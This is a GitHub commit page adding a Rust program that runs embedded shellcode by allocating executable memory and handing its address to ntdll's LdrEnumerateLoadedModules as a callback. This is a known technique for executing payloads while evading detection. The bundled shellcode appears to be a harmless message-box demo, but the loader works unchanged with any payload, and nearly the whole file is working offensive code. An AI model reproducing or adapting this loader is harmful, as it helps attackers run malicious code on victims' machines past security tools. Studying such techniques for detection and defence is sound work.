Skip to content

Commit 79fe227

Browse files
committed
ShellExec using LdrEnumerateLoadedModules
1 parent 9d88e78 commit 79fe227

File tree

1 file changed

+96
-0
lines changed

1 file changed

+96
-0
lines changed
Lines changed: 96 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,96 @@
1+
/*
2+
Shellcode Execute using LdrEnumerateLoadedModules
3+
Author: @5mukx.
4+
*/
5+
6+
use std::ptr::null_mut;
7+
use winapi::um::memoryapi::VirtualAlloc;
8+
use winapi::um::winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE};
9+
use winapi::um::libloaderapi::{GetModuleHandleW, GetProcAddress};
10+
use winapi::shared::ntdef::NTSTATUS;
11+
use winapi::shared::minwindef::{HMODULE, BOOL};
12+
use std::ffi::c_void;
13+
use std::ffi::CString;
14+
15+
16+
static OP: [u8; 328] = [
17+
0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,
18+
0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
19+
0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,
20+
0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,
21+
0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
22+
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
23+
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,
24+
0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,
25+
0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,
26+
0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,
27+
0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
28+
0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
29+
0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,
30+
0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,
31+
0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,
32+
0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,
33+
0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,
34+
0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,
35+
0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x3e,
36+
0x48,0x8d,0x8d,0x30,0x01,0x00,0x00,0x41,0xba,0x4c,0x77,0x26,
37+
0x07,0xff,0xd5,0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,
38+
0x8d,0x95,0x0e,0x01,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x24,0x01,
39+
0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
40+
0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,
41+
0x48,0x65,0x79,0x20,0x6d,0x61,0x6e,0x2e,0x20,0x49,0x74,0x73,
42+
0x20,0x6d,0x65,0x20,0x53,0x6d,0x75,0x6b,0x78,0x00,0x6b,0x6e,
43+
0x6f,0x63,0x6b,0x2d,0x6b,0x6e,0x6f,0x63,0x6b,0x00,0x75,0x73,
44+
0x65,0x72,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00
45+
];
46+
47+
48+
type LdrEnumerateLoadedModules = unsafe extern "stdcall" fn(
49+
BOOL,
50+
extern "stdcall" fn(*mut c_void, *mut c_void, *mut bool),
51+
*mut c_void,
52+
) -> NTSTATUS;
53+
54+
fn main() {
55+
unsafe {
56+
let address = VirtualAlloc(
57+
null_mut(),
58+
OP.len(),
59+
MEM_RESERVE | MEM_COMMIT,
60+
PAGE_EXECUTE_READWRITE,
61+
);
62+
63+
if address.is_null() {
64+
eprintln!("Failed to allocate memory");
65+
return;
66+
}
67+
68+
std::ptr::copy_nonoverlapping(OP.as_ptr(), address as *mut u8, OP.len());
69+
70+
let h_ntdll: HMODULE = GetModuleHandleW(windows_wide_string("ntdll.dll").as_ptr());
71+
if h_ntdll.is_null() {
72+
eprintln!("Failed to get ntdll handle");
73+
return;
74+
}
75+
76+
let func_name = CString::new("LdrEnumerateLoadedModules").unwrap();
77+
let ldr_enumerate= GetProcAddress(h_ntdll, func_name.as_ptr());
78+
if ldr_enumerate.is_null() {
79+
eprintln!("Failed to get LdrEnumerateLoadedModules address");
80+
return;
81+
}
82+
83+
let ldr_enum_func: LdrEnumerateLoadedModules = std::mem::transmute(ldr_enumerate);
84+
85+
let callback: extern "stdcall" fn(*mut c_void, *mut c_void, *mut bool) =
86+
std::mem::transmute(address);
87+
88+
ldr_enum_func(0, callback, null_mut());
89+
}
90+
}
91+
92+
fn windows_wide_string(input: &str) -> Vec<u16> {
93+
use std::iter::once;
94+
input.encode_utf16().chain(once(0)).collect()
95+
}
96+

0 commit comments

Comments
 (0)